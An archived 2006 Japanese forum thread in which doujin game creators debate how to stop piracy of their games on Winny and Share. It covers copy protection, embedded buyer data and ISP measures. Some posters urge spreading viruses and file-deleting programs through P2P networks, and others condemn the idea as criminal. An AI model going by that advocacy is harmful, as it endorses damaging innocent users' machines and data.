2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Winnyで同人ゲームを無断コピーさせない方法 その2

1 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 20:54:19 ID:g7NB3/x3
Winnyで同人ゲームを無断コピーさせない方法を考えるスレッドです。
主に同人サークルの方々の参加になると思いますが
一般の方の参加や意見も聞きたいと思います。
不正コピーをさせない良い案や対策方法を考えていきましょう。

Winnyで同人ゲームを無断コピーさせない方法
http://game10.2ch.net/test/read.cgi/gameama/1162135331/

2 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 20:58:58 ID:/Ak0WG6e
ルールとして次の話題はタブーにして欲しかったな

・同人(趣味)で金儲けはダメ
・金儲けるなら会社にしろ

話題がそれてしまうから

3 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:03:03 ID:zu8TjuGI
前スレの主な流れ

(´・∀・`)「やっぱ、ウイルス流すのが効果的じゃない?」

<丶`∀´>「な、なにを言うニダ! う、ウイルス流すなんて、そんなの犯罪ニダ!」
<丶`∀´>「犯罪はやめるニダ!
 もっと他の方法を考えるニダ!」
<丶`∀´>「大体、二次創作をする犯罪者が、偉そうなことを言うなニダ!」
(´・∀・`)「やっぱ、ウイルス流すのが効果的じゃない?」

<丶`∀´>「な、なにを言うニダ! う、ウイルス流すなんて、そんなの犯罪ニダ!」
<丶`∀´>「犯罪はやめるニダ!
 もっと他の方法を考えるニダ!」
<丶`∀´>「大体、二次創作をする犯罪者が、偉そうなことを言うなニダ!」
<丶`∀´>「金を儲けようとする卑しい根性が嫌ニダ!
 ただでP2Pに流せニダ!」

4 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:03:51 ID:zu8TjuGI
あ、失敗した。

前スレの主な流れ

(´・∀・`)「やっぱ、ウイルス流すのが効果的じゃない?」

<丶`∀´>「な、なにを言うニダ! う、ウイルス流すなんて、そんなの犯罪ニダ!」
<丶`∀´>「犯罪はやめるニダ!
 もっと他の方法を考えるニダ!」
<丶`∀´>「大体、二次創作をする犯罪者が、偉そうなことを言うなニダ!」
<丶`∀´>「金を儲けようとする卑しい根性が嫌ニダ!
 ただでP2Pに流せニダ!」

5 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:04:26 ID:/Ak0WG6e
>>3
ワラタ

6 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:11:17 ID:COo7jMvc
初代スレ>>1の偉大なお言葉

1ローカルルール変更議論中@詳細はLR議論スレにて 2006/10/30(月) 00:22:11 ID:ZUNmmcSQ
Winnyで同人ゲームを無断コピーさせない方法を考えるスレッドです。
主に同人サークルの方々の参加になると思いますが
一般の方の参加や意見も聞きたいと思います。
不正コピーをさせない良い案や対策方法を考えていきましょう。

2ローカルルール変更議論中@詳細はLR議論スレにて 2006/10/30(月) 00:23:56 ID:ZUNmmcSQ
一般的な案としてウイルスを仕込んだソフトを大量に流す
ランダムでハードディスクのファイルを削除するプログラムを仕込むなどがありますが
こういうのを意図的にやることは犯罪になるのでしょうかね?

7 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:14:56 ID:/Ak0WG6e
>>6
>>1は犯罪になるのかどうか聞いているだけ
犯罪しているオマイらは>>1にも劣るチョウセンモドキ害虫なんだけどな

8 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:16:49 ID:noEbsugD
犯罪は犯してないんだよ。モラルに反していようとも。
で、ウイルスを流すのは犯罪な。流したところで捕まるかは別だけど。

9 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:25:52 ID:/Ak0WG6e
P2P対策だけどダウンロード販売で暗号化した住所や名前を埋め込んだデータがなければ動かないようにして購入した人にそのデータを送る。
P2Pで流失した場合、暗号化したデータを復元して住所、名前を特定。んで裁判。
50人くらい刑務所にぶち込めば流失も少なくならない?
これを同人サークルすべての人に認証してもらって協力して徹底的にやる!

10 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:29:07 ID:PPuiELJd
そしてクラックが出回る。

11 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:31:04 ID:zu8TjuGI
ダウンロードは犯罪じゃないが、ダウンロードして権利も無いのに使用すれば犯罪だよ。

12 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:32:09 ID:/Ak0WG6e
>>10
少しでも流失が遅れるのならそれでも効果ある
クラックされてもまた新しく難しい暗号を作ればいい
とにかく害虫を駆除しまくる

13 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:32:35 ID:JSzR++e8
暗号化データをEXE内埋め込みにすればよくね?
そんですげえしょぼいコピーガード付けてクラック屋にはそっち掴ませればいい。

14 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:34:04 ID:/Ak0WG6e
出来ればツクールの人の作品にも適応出来る暗号化プログラムだったらさらにいいかも

15 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 21:50:33 ID:/Ak0WG6e
>>暗号化データをEXE内埋め込みにすればよくね?

暗号化したデータは1つや2つじゃなくいろんなところに隠しておくと効果的
音楽やグラフィックなどにも、、、全部見つけ出すのは至難の業かと。

とにかく1人でもいいので裁判に引っ張り出してかかった裁判費用とか流失し続ける
ソフトの料金をふんだくって裁判所から出てくるところを写真撮影して
祭りにでもなってくれれば流失も減るだろう

16 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 22:32:35 ID:Nwxr7z0A
>>11
またなんちゃって法律家かい。懲りないねぇ・・・。

17 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 23:14:07 ID:/KB54NJz
とりあえずp2p憎しで感情的になっても、業界も自分も先細りするだけだと思う。
対策は、冷静に何が有益か判断したほうがいい。
p2pがあるから売れない、と言ってるだけなら、それもp2pに依存した態度だ。

18 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 23:40:56 ID:x5KBQQY/
>>17
目の前の不安要素を無くした上で現実と向き合い判断してもいいのでは?
そうすればp2pに依存した態度を示さなくてもなくていいだろうし
p2pのせいにもしないですむと思う

プログラムが出来ないCG作家さんは
CGに直接個人情報を似た系列の色で描くという手もあります。

19 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/06(月) 23:54:52 ID:xs03GHgL
■ 本体ダウンロード ■ (ウイルスチェックは自己責任で)
ttp://download.cowscorpion.com/dl/files/FileSharing/Share10_ex2.zip

■ Share本体ダウンロード ■ (心配な方)
Share10_ex2.zip ファイル倉庫NT56s0tGbv 753,309 e3ebc4e73fb2ce8ed5e3904a82067715be0dd4fd

■ 推奨クラスタ ■
【TESTER_WORKS】
Share

■ 推奨トリガ ■
クエリワード:Share10_ex
ID:ファイル倉庫NT56s0tGbv
「条件が一致したらトリガを削除する」のチェックを外す

■ 推奨フィルタ ■
村民

■ 更新履歴 ■
Ver1.0 Extream 2 (2006/04/01)

 AV修正 orz

Ver1.0 Extream 1 (2006/04/01)

 ソケットと帯域制御の最適化を行い転送速度が向上。
 Share UP/DOWN接続数の上限を20+1に拡張。
 低速ホストの切断機能追加。
 ZoneId対応。

20 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 00:20:31 ID:3EoYCoxi
>17
先細ってるのは同人バブルで浮かれてたスキルの低い人たちで
まともにつくってるところは現状でも増加傾向にあるんじゃないかな。
DLsiteなんて昔は初日100越えたら大事だったのに今はぽこぽこ越えて
初日1000越えするところだってある。
そういう普通に買ってくれてるる人たちにちゃんと支えられている。

ただだからといってP2P野放しでいいやと思うわけでなく。


21 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 00:26:52 ID:BMYt47bJ
P2P撲滅は偉い人に任せればいいと思うよ

22 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 00:48:00 ID:aGn8wVri
ぶっちゃけ、もしp2pが滅びる日が来たら、同時に同人業界も壊滅的な打撃を受けると思う。
同人とか、一番著作権の恩恵を受けられない分野だし。

23 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 00:50:17 ID:OS60TfHD
啓蒙とかも大事だよ。一人一人の言動が常識を作っていくわけだし。

自力じゃ直接解決できないからって諦める必要はなくて、
作品製作がおろそかにならない程度に、適度に撲滅活動もすりゃいい。


>>10
ある程度人気のあるものだったらそうなるだろうけど、
たいした人気のないものだったら放置されることも多かろう。

たいした規模じゃないサークルは、いたちごっこの最先端をゆく
強力なプロテクトを掛ける必要はなくて、非プログラマがバイナリ
エディタを使ってある程度の努力でどうこうできてしまわない程度の
プロテクトを仕掛けておけばOK。

24 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 01:19:18 ID:3EoYCoxi
>22
どんな打撃があるのか皆目わからん。
それで考えてみたところP2Pが滅びるとかじゃなくて、商業系が逮捕対象にできるとかになって、
流れなくなったら同人がターゲットにされるということだろうか。

それは可能性大いにあるけどP2P自体の需要も激減するんじゃなかろうか。

25 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 01:32:35 ID:KK0tuSTj
>>18
残念ながら、完全な対策はないのが現状。
P2Pの不安を根絶することはできない。
「もっと強力なプロテクトを」と考えても、
今までの経緯では正規ユーザーが損するばかりだったんですよ。
気にしすぎたら負け。どこかで費用対効果を考え、割り切るしかない。

現状ではむしろこれが前向きな姿勢だと思う。
勿論、正規ユーザーに損のない対策を模索することは有意義ですが。

26 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 01:34:15 ID:ZZuAtlYV
気分の問題だからつくりたきゃ作れよ
それで気分が晴れるなら

27 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 02:02:22 ID:8+Bh6+4U
でもプロテクトに凝るのはいいけど、実際に使うとプロテクトに関する不具合が増えるのは忘れずに。
どうせすぐ破られてトラブルの原因になるだけと言っても、会社の上の方と業界は掛けたがる…
掛けても掛けなくても売上に目立った差が出ないんだよね、手間は確実に増大するけど。

同人でやるってことは、これの対応する覚悟はした方がいい。
対応が遅かったり適当だったら客離れの原因になるから。

28 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 02:25:39 ID:3EoYCoxi
P2Pの不正利用をあおるような雑誌特集がムカツク。

29 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 03:08:20 ID:ZcjuDDqF
>>9
コミケなど全イベントに全く参加せず
供託の通信販売も無しでダウンロード販売のみ
というのが前提になるな

でもそういうシステムなら事前に説明する必要があるし
先に書いた販売手段が限られるのに加え始めるまでが面倒というのもあって
結局売り上げ下がって本末転倒なんじゃないの?
しかもダウンロードごとに異なるデータになるということはそれだけで相当のコストがかかって
売り上げ本数次第ではDL販売なのに赤字なんて可能性も大なのでは
さらにそこまで頑張っても即クラック出たら全て水の泡

30 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 17:17:21 ID:nqMkuEO5
いいこと思いついた。イベント専売にして、流れるたびに次回イベントで購入客をビンタ。

31 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 17:56:10 ID:5FHkD3zG
>>30
猪木乙

32 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 19:57:36 ID:J6daenEj
>>9
買ってもデータが送られるのを
待たなきゃならないのはユーザー側にはつらい

33 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 21:19:56 ID:s9NFuNSx
プロテクトは作るのが難しい。
暇人がプロテクトを破るのも限界があるから、みんなで種類の違うプロテクトを
実装すればかなり効果があるだろうけど、それも難しい。

やっぱり一番楽で効果があるのは、ウイルスだろうね。

34 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 21:31:17 ID:IFG+tVPU
ウイルスの実験場にするには持って来いだよなP2Pは
コピー対策でウイルス製作研究してて同人ゲー作りよりそっちに嵌っちまうかも
しれないぞ

35 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 22:17:47 ID:QdMOxcNT
>>33,34
器物損壊&電磁的記録毀棄幇助乙

36 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 22:59:22 ID:8sZvYgCG
2ch住民程度が話し合ってどうにかなるのなら
ゲイツとかAdobeがとっくにどうにかしていると思われる。

37 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 23:18:35 ID:ZcjuDDqF
前スレ序盤で「不可能」という結論が出たと何度も言ってるのにね

38 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 23:25:32 ID:nqMkuEO5
不可能でも許容しない態度とらないとだめだもの。

39 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 23:27:30 ID:3/uNFDzT
こんなところでそんな態度取ってもなんの解決にもならないよ。

DL板でage荒らし&AAスクリプト荒らしでも
してるほうがよっぽど効果的だろw

40 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 23:41:59 ID:BfXla19i
ウィルス → 多数の即時対策
プロテクト → 既存以上の物作れたら同人なんて売らない 
制作費の足し → コピーどこ吹く風
単に趣味 → コピーどこ吹く風

Winnyで同人ゲームを無断コピーさせない方法



■ 不 可 能 ■




41 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/07(火) 23:58:13 ID:Xz7mZyCU
いいじゃん、どんどんウイルス捲けば
いまだに俺俺詐欺なんぞに引っかかるやつがいるのと一緒で、
結構な被害が出続けるだろう
それで国にP2Pを禁止、制限させる法律を作らせると

42 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 00:06:48 ID:0zpKWHGK
>>41
そうなると、ネットの規制が始まるよ。

43 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 00:22:05 ID:p0fqAiJV
どの道、著作権利権団体の後押しで規制は始まるよ
警察とて取り締まりたくてうずうずしてる、
Winnyの作者逮捕しちゃうくらいだからな
反面Winny側には有力な支援者はいない、さらに世間一般の評判は頗るよくない
規制の法案が国会に提出されたら、右から左で可決されちゃうだろね
それに少し拍車をかけてあげる、ただそれだけのことさ

もう少し具体的に書くと、P2P全体ではなく、匿名でのP2P利用が
規制の対象になるような気がするけどね
BitTorrentは合法、Winnyは違法みたいな感じかな

44 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 00:22:58 ID:FrrlDCcr
馬鹿だw

45 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 00:25:27 ID:0zpKWHGK
>>43
        __
       '´   `ヽ、
             N、〆⌒
             -‐リ'´ ̄ ̄`ヽ、 
             / /" `ヽ ヽ  \  
         //, '/     ヽハ  、 ヽ
         〃 {_{ノ    `ヽリ| l │ i|
         レ!小l○    ○ 从 |、i|     
         ヽ|l⊃_,,. '^ 、 ⊂⊃ |ノ│    ?
.      /⌒ヽ__|ヘ(;;__,..)  j /⌒i !   
      \ /:::::| l> |__|.イァ/  /│.     
       /:::::/| | ヾ:::|三/::{ヘ、__∧ |
       `ヽ< | |  ヾ∨:::/ヾ:::彡' |


46 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 00:36:14 ID:hlknIsP3
そのうちプロバイダのほうがP2P対策をするんじゃないかなぁ。
常に大量のアアップダウンをしてるとマークされるとか。

P2P使用者が調子に乗りすぎると
冗談無しに、ネットの検閲とか法規制とかで締め付けてきそう。

10年もすると「あの頃のネットは自由だった」ってことになるかも。

47 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 00:53:52 ID:p0fqAiJV
つまり、そうなる日まで>>1は作品公表控えて、ウイルス撒けってことだ
つうか>>1もDL今のうちにいっぱいやっとけ、今ならやり得なんだから

48 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 01:19:14 ID:pVSy78yp
それで突然逮捕されたらどうするんだw
今でも逮捕される可能性はあるだろ

49 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 02:02:52 ID:irKhRJ+g
>>43
規制規制いいながら幾年月…

>>46
すでに規制してる所なかったっけ?
でも「通信の秘密の侵害」だとかなんだとかで法に引っかかるそうだ。

なんというP2P天下


50 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 02:07:36 ID:0zpKWHGK
>>49
nyのパケットだっけか?遮断できるってことでプロバイダが検討してたらしいが
通信の秘密の侵害でアメリカのどっかの会社か政府かが圧力かけてきた。

ようするに手紙の検閲とおんなじことだからな。

51 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 02:16:47 ID:FrrlDCcr
そもそもぷららのやってることは詐欺だからな

52 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 02:16:51 ID:Q6cXAbPY
ちゃんとニュース聞いてんのかw
アメリカじゃなくて日本政府だろwwww

あと、同人ゲームはwinnyはほとんど輸入で今はshareばかりだよ
winnyがなくなっても同人ゲームの流通は変化ないし
同人誌とかアニメみたいなwinnyの方が盛んなジャンルもshareに移行するだけ
winny・share以外にもp2pは色々あるわけだからウイルス流すにしろ
本気で邪魔するならwinnyだけじゃなくあらゆるp2pを見張らないとね


53 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 02:18:03 ID:p0fqAiJV
http://isp.oshietekun.net/index.php?FrontPage
これ見ると、やり始めてるぽいけどね
法より公共の福祉が優先するよ、法なんか後追いでどうにでもなる
現に情報流出だの被害が出てるのだからな

54 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 02:18:29 ID:0zpKWHGK
>>52
日本政府に圧力かけたのがアメリカからだったんだがw

55 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 02:24:31 ID:0zpKWHGK
nyの場合はソースが入手済みで解析されたからパケットパターンを
解析して遮断できるとかの技術だったはず。
基本的にTCP/IPは通信するところを限定しないと何を送ってるのかはわからない。


>>53
帯域絞ると動画の配信やらに支障が出るとは思うけどね。
情報流出を被害と呼ぶのもどうかしてると思うけど。
自業自得でしょ。


56 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 03:32:18 ID:zm0TNIlY
>>40
ウィルス → プロの即時対策 → 拡がれば作者逮捕(元キャッシュ割れが仇に)

P2P自体は違法ではない上に
一般にウィルスの方がかなりタチが悪く迷惑。


撒けって人。マジで言ってる?


57 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 05:37:31 ID:nfkszfVx
ウイルス自体は違法な物にしこまれるんじゃないの?

58 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 06:26:43 ID:zLYu3hm/
まず、商業でもほとんど無理なことを同人でできるわけないってのは共通認識になってるの?
だからって、ウイルスばらまけってのはテロリストと同じ論理だ。普通に犯罪行為。
まあやりたきゃ止めないけどね。
でも作ったゲームが売れないからウイルスまくってのは、逆恨みだね。
ひぐらしなんかは100円で売ってるときは全く売れなかったし、nyにも流れてなかった。
鬼隠し丸ごと体験版にしてからブームになって、それと共に製品版がnyにも流れ出した。
結局流れても売れるものは売れるのよ。

59 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 07:16:05 ID:nfkszfVx
その例は流れても売れる物は売れるじゃなくて
売れた物じゃないと流れないってことだと思うんだが。

あとP2Pのせいで売れないって言ってるやつなんてほとんどいねーだろ。
前スレの1ぐらいじゃね?流されるのがウゼーんだから逆恨みもなにもない。

60 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 08:14:14 ID:Guogz75n
今プロバイダが行ってるのは
・検索ノードパケットの妨害/遮断
・特定時間帯における通信速度制限
・一定期間内(一週間とか)におけいてパケットの上限設定(7日間の通信量が20GBを超過するとISDN並になるとか)
くらいだった筈だよ。一時期はnyのパケットパターンも遮断してたみたいだけど…

「TCP通信の妨害は法に従い運営を行うプロバイダの権限を超える」
ってアメリカの圧力を受けた総務省がお達しを出してからは通信総量規制やノード遮断程度になった筈。

金子氏が逮捕されてなかったら今頃は日本のネットがパンクして鯖落ちまくって社会的被害甚大だったろうから、
ある意味仕方無かろうね。思えば金子氏逮捕以後はプロバイダの鯖が落ちる事もかなり減った。
金子氏は可哀相だけどあれだけスキルありゃTCP通信の権威としてどこへ行っても通信技術の研究出来るでしょ。

てかnyは完全に匿名で管理者の居ない掲示板作るのが本来の目的で、
ファイル交換機能はオマケだったんだがな…(実は2.0になってからファイル交換機能はアップデートされてないし。)

61 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 10:48:41 ID:5UyjQ+tU
>>56
マジで言ってるに決まってるだろ、俺がやるわけじゃないんだから

P2PでもWinnyとかShareが問題にされてんだろ?ここじゃ
匿名じゃないやつは、流してる奴を特定して請求すりゃいいだけなんだろ?
よく知らんけどさ
Winnyの悪名をより広げて、規制させるにはウイルス散布が一番手っ取り早いから
やりたきゃやればって言ってるだけさ

猥褻物撒いてるやつや著作権違反してるやつがのうのうとしてんだから
ウイルスも巧妙に仕込んで撒けば捕まりゃしないよ、多分な
現に今のところウイルス散布では一人も捕まってないんじゃなかったか
著作権じゃなんか、捕まった間抜けがいたみたいだけど

捕まらなければ何やってもいい世の中だから、>>1は精々がんばりやいw

62 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 11:45:18 ID:csQVITKM
>>61
お前は常識がなさ過ぎる

63 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 12:44:15 ID:+0poAXty
知名度や人気が低すぎる場合、無断コピーするやつはいないからさておき、
・・・内容がよくわからなくて手が出せない作品、
中古ゲーム以下っぽくみえるのに値段が高くて手が出せない作品、
地理的条件等で手に入れられない作品、
深夜の抜きネタで18禁モノな作品、

どれか1つでも入ってれば個人的にDLしそう・・・(Winny入れるのメンドクセ)。
・・・とらのあなとか行ってパッケージだけ見ただけで即買いなんか
出来ない慎重な人間ですから・・・ orz

64 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 13:34:25 ID:HIsHySO3
>>61
ヒント:ウイルスは巻き添えがひどい

感染拡大、プライベートデータ流出、……
こういうのを考慮する知能がない馬鹿のために常識というものが
あるんだが、常識を知らないほどの馬鹿が>>61だな。

>>63
それは慎重な人じゃなくて、ただの異常者。
慎重な人間なら、体験版やプレイムービーや評判などで様子を見て、
それで買う気にならない場合には購入を保留するだろうからな。

65 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 13:52:22 ID:tK0WrhZc
異常者は言い過ぎだが、怯懦で姑息でせせこましい早漏ではあることは確かだ。
悪いことはいわないから、使いこなせないものを好奇心で入れるのはやめとけ。

66 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 13:59:24 ID:jVLI8hW2
犯罪を煽るスレになってきてるなw

67 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 14:22:16 ID:wrAIGwH5
ウイルスは巻き添えがひどい・・・・それが狙いなわけだが

これは聖戦だ、ジハードだ、>>1よ、おまえのその指でもっともっと
社会問題化させるのだ
そもそも最初にウイルス云々言い出したのはおまえだ、健闘を祈る

68 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 14:39:58 ID:nfkszfVx
捕まらなきゃいいんじゃね?P2Pもウイルスも
そんなレベルだ。どっちもがんばれ

69 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 14:54:24 ID:oqmkJOyJ
ウィルス撒くならこんなところでウジウジ雑談してないで
とっとと作ってとっととばらまいて逮捕されればいいのに。
どうせ作れないんだろうけど。

70 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 15:40:00 ID:T+yLEQnk
そんなに逮捕されてたっけ?

● ウイルス対策ソフトでは暴露ウイルスを防げない
 Winny でダウンロードされるコンテンツは、3年前はゲームやアダルト、
音楽が主流だったが、最近ではアニメが人気。特に、深夜時間帯の番組や
地方では放映していない番組が多い。Winnyで人気があるコンテンツ上位
30位を集計したところ、そのうち27本はアニメだった。
 ただし、最もダウンロードされているコンテンツでも、「約1,000人のユーザーが
所有する程度」(杉浦氏)。Winny上でも“ロングテール”現象が見られ、多岐に
わたるコンテンツがダウンロードされているという。
 また、話題となっているのが、いわゆる“暴露ウイルス”に感染した人が持って
いたファイルだ。この情報漏洩ファイルは、Winnyのネットワーク上に流れるコン
テンツの約3%を占める。杉浦氏は、この割合はさらに増えると予想する。
 「情報漏洩を引き起こすウイルスは、気軽に亜種を作成できるため、大量の
亜種が発生している。しかし、流通量が少ないため、ウイルス対策ベンダーは
新種ウイルスの検体を入手しきれていない。そのため、ウイルス対策ソフトでは
対応できず、暴露ウイルスに感染する例が多い。ちなみに、暴露ウイルスに感染
したことのある人は、数万人に上る」

71 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 17:06:02 ID:gxQ1tBhQ
ウイルス撒いて逮捕されるなら違法コピー流してる奴がとっくに逮捕されてるはず
winnyやshareで個人特定されて逮捕されたやつなんざ一人もいない

あと、同人ゲームはwinnyじゃなくてshareの方がほとんどで基本的に神鳥が流す物ばかりだから
鳥無しでウイルス撒いても効果はほぼゼロ
感染して情報暴露してるやつは同人ゲーなんかとは無縁な限りなく一般に近い人種で
同人ゲームやるくらいのオタレベルになるとほとんどは対策済みだし仮に感染してもすぐ気付いて対応する
情報流出してるヤツの中身見ても同人と縁ありそうなファイルは見たこと無い

72 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 17:37:52 ID:csQVITKM
ウイルスに感染したって手動で取り除くだけだし
そもそも踏まない奴はとことん踏まないんだから意味無い

73 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 17:44:58 ID:HIsHySO3
まさに百害あって一利なしだな。

74 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 18:05:41 ID:T+yLEQnk
そもそも通常のウイルスだって利なんてそんなないと思うけど。
キンタマ系の場合思いもよらない祭がおきるからそれだけで仕込むヤツいそう。

「どうせ同人だし」っていう感覚と同じような感じで
「どうせP2Pユーザー」だしっていうので組んでるやついると思うぞ。

どっちも俺に関係ないので派手にやりあって欲しい。

75 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 18:13:21 ID:hlknIsP3
自分でウィルス等の対策ができるレベルの奴がやる分には、
アングラの範囲で済んでいて大して問題にはならなかったと思う。

知識ゼロの奴が、解説サイトとか雑誌とかの情報をもとに気軽に手を出すから、
ウィルスや流出問題が起きてるんだよなぁ。

やるべきじゃないが、ウィルスを大量にばら撒くのは、いい手段だとは思う。
まぁ、71の言うとおり同人に手を出すオタにはあまり効果なさそうだが。

76 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 18:19:22 ID:HIsHySO3
この場合の利ってのは、前スレ>>1のいう、
無断コピーの抑止になる、ということだ。
通常のウイルスの場合の話なんて誰もしとらん。

通常のウイルスの場合は、DDos攻撃に利用されたり、
不法なアクセスの踏み台として使えたりするから、
十分利があるんだ。

ただ、そういう目的をもって配布しているわけではない、
愉快犯的な配布者もいるのは確か。通常のウイルスの場合にも
そういうことはあるし、P2Pのそれなんかもそんなんだろう。
そしてその意図は(ひっかかる奴がいることで)果たされているわけで、
これもまた(配布者にとっての)利に適った行為なわけだ。

77 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 18:37:58 ID:zLYu3hm/
やれやれっつって、誰も自分からウイルス撒こうとしない件。


78 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 18:41:58 ID:8weFiB+N
わざわざ、これからウイルス撒くぞと宣言するやつはいないだろ

79 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 18:41:58 ID:T+yLEQnk
ライトユーザーが怖がってP2P自体止めれば全体が縮小しないまでも抑制されるとは思うけど。
だれもが気軽に出来るより圧倒的にいい。
あと自分から蒔こうなんてそりゃおもわん。作れる技術もないけどね。でも技術あったとしてもやらないと思うわ。

80 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:13:37 ID:HIsHySO3
怖がる云々は、特に自作の同人ソフトにウイルス添付することとは
関係なく今現在も暴露ウイルスが出回ってるから、とくにこのスレで
話すことはないだろう。

 「自作の同人ゲームに関してだけではなく、
  P2Pネットワーク全体をどうにかしなければならない」
という結論になるとしたら、そこから先の話はとくに同人ゲーに限る
話ではないから、もっと適切な板で話すべきことだな。

81 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:17:58 ID:hlknIsP3
http://kakaku.com/bbs/Main.asp?PrdKey=00303010240#5524792

>という訳で共有ソフトとは、ネットに繋いでいれば
>他人が保存しているデータをネット上で取り込むことができるソフトなのです。
>素人考えなのですが、これは自分自身で使用する分には違法性はなく、
>取り込んだデータを他人に売ったり譲渡した場合が違法であると私は認識しております。

こういう奴らがP2Pを支えてるんだよなぁ。
うしろめたい気持ちが全くないのが、
恐ろしいというか、頭のネジが外れてるというか・・・

こういう層をなんとかしていくのが重要なんじゃないかな。

82 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:20:58 ID:kp5V98jB
>>71
winny使って逮捕される奴はたまにいるぞ

83 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:23:47 ID:T+yLEQnk
>80
問題提起的にスレに存続してもいいと思うけどなー。
俺もこのスレにないかぎりどうでもいいのできっと覗かないし。


84 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:30:54 ID:WtmQHDg4
>>79
ライトユーザーの抑制にはなっても
同人ゲームするほどのユーザーには効果が無いのではという話
そもそもこれだけ暴露ウイルスは恐ろしいとテレビでやってるのに
逆に知らなかった人間まで興味本位で手を出して暴露ウイルス出た後は
むしろ使用者は増加する始末
